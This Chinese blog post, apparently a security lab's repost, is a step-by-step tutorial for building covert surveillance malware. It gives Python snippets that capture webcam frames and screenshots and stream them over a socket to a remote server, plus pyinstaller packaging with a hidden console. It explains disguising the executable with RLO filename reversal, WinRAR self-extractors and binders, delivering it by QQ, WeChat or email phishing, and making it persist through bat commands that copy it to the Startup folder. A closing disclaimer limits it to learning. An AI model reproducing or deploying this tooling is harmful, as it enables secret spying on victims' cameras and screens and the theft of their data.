记录利用摄像头、截屏等进行实时监控

渗透技巧 2年前 (2021) admin
783 0 0


01前言



在信息安全的链条中,人的因素是最薄弱的一个环节,人的复杂性充满着多种不确定因素,针对于每个人的薄弱点,依托于真实环境,通过对每个受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段来获取信息或达到自己的相应目的,对比与挖掘漏洞来说,人的突破口相对容易很多。



02整体思路



1、编写摄像头、截屏的脚本并打包成可执行文件;

2、针对于各个真实的系统环境,伪装脚本文件,诱使用户点击触发;

3、远程服务器接收处理所获取的结果。



03如何伪装脚本



1、Unicode后缀名反转,RLO是Unicode为了兼容阿拉伯文字从左至右的阅读习惯设计的一个转义字符。可以用来伪装文件名。

记录利用摄像头、截屏等进行实时监控



记录利用摄像头、截屏等进行实时监控

记录利用摄像头、截屏等进行实时监控



2、winRAR自解压文件

可以压缩多个可执行文件进行隐藏,自解压的压缩后的文件后缀名为.exe结尾文件,可以设置自解压路径,解压后要运行的程序。

记录利用摄像头、截屏等进行实时监控

记录利用摄像头、截屏等进行实时监控

记录利用摄像头、截屏等进行实时监控

记录利用摄像头、截屏等进行实时监控记录利用摄像头、截屏等进行实时监控



3、文件捆绑

文件捆绑器在正常的exe执行文件下,捆绑exe木马文件,点击执行会一起执行。



04选择钓鱼方式



1、通过微信、QQ等即时通讯软件发送

2、通过邮件发送




05攻击过程



1、通过python编写脚本,实现调用笔记本摄像头功能,使用CV2、numpy这2个库。


cap = cv2.VideoCapture(0) 调用笔记本自带的摄像头
ret,frame = cap.read() 读取图片
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 95] 压缩图片
result, imgencode = cv2.imencode('.jpg',frame,encode_param)
转换图片格式


2、使用socket传输图片到服务器上实现监控,代码简单示意。

address = ('192.168.1.1', 2345)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(address)
sock.send(数据流)

3、在公网服务器上,使用socket服务端进行接收图片,并保存在服务器上。

 代码省略


4、编写好的python客户端脚本进行一个打包,打包成exe,注意cv2,numpy库的版本不要太新,不然打包时候会出现问题


使用pyinstaller -F .py -p 库文件目录 -i .icon -w


-F  参数 把所需要的库文件、代码、图标打包生成一个exe文件

-w 参数 程序启动时不显示命令行

-p 参数 指定所需的库文件

-i  参数 指定图标


5、使用后缀名反转方式进行伪装,分别尝试使用微信、QQ、邮件进行发送,发现一些问题。

微信客户端(windows)-接收方会显示exe的文件属性,会提示文件风险,Unicode反转后缀名会被转换为正常的exe结尾的图

记录利用摄像头、截屏等进行实时监控


记录利用摄像头、截屏等进行实时监控





QQ客户端(windows)-实时发送文件不会更改伪装后的后缀名,双击即可执行。

记录利用摄像头、截屏等进行实时监控

记录利用摄像头、截屏等进行实时监控

邮件(Foxmail)-也是会转换成正常的exe文件


记录利用摄像头、截屏等进行实时监控

6、云服务器执行服务端脚本等待连接并接收图片

记录利用摄像头、截屏等进行实时监控


记录利用摄像头、截屏等进行实时监控


记录利用摄像头、截屏等进行实时监控


7、在调用摄像头的时候会发现,目前笔记本摄像头都带打开提示和指示灯,一旦启动摄像头就会开启指示灯,如何绕过笔记本的指示灯,只调用摄像头?


摄像头结构示意

记录利用摄像头、截屏等进行实时监控

可以得知:LED是ASIC控制的,ASIC控制LED的方式是写在摄像头的固件里的。


如果想要绕过那要从硬件入手,重新烧录摄像头固件,或者固件本身存在漏洞。


8、不能绕过摄像头指示灯,那只能另选他路,调用笔记本截屏功能默默进行监控。使用PIL库,在原本的代码中新增一句代码

im = ImageGrab.grab() 截屏

其余过程都一样


9、但这个脚本只能执行一次,如何使脚本自启动?


windows系统当中可以把exe文件放到开始-程序-启动这个目录下,重启就可以自启。


10、需要写一个bat文件启动dos命令把exe文件移动到启动文件夹下,这时可以使用自解压的钓鱼方式,解压自运行。

以windows10不同版本之间的路径不一样,大概分为2种:

C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup

C:Users%UserName%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

11、编写bat文件。


cmd /C “move 1.exe C:Users%UserName%AppDataRoamingMicrosoftWindowsSTARTM~1ProgramsStartup”


cmd /C “move 1.exe C:ProgramDataMicrosoftWindowsSTARTM~1ProgramsStartup


路径中含有空格会在dos命令中报错,需要用短路径进行代替。

自解压的显示图像


记录利用摄像头、截屏等进行实时监控

自解压配置内容

记录利用摄像头、截屏等进行实时监控

bat内容


记录利用摄像头、截屏等进行实时监控




11、1.bat执行结果,执行成功

记录利用摄像头、截屏等进行实时监控





本文章仅供学习交流,不得用于非法用途!

      

关注我们

       启明星辰知白学院旗下安全实验室,致力于网络安全攻防实战探索与积累、解读前沿安全技术,安全培训课题、提供企业级安全自动化解决方案。




原文始发于微信公众号(河图实验室):记录利用摄像头、截屏等进行实时监控

版权声明:admin 发表于 2021年11月23日 上午1:00。
转载请注明:记录利用摄像头、截屏等进行实时监控 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...